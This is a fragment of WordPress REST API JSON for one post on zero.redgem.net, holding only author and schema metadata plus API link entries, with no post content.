redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27748","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=27748"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27748\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=27748"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=27748"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=27748"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}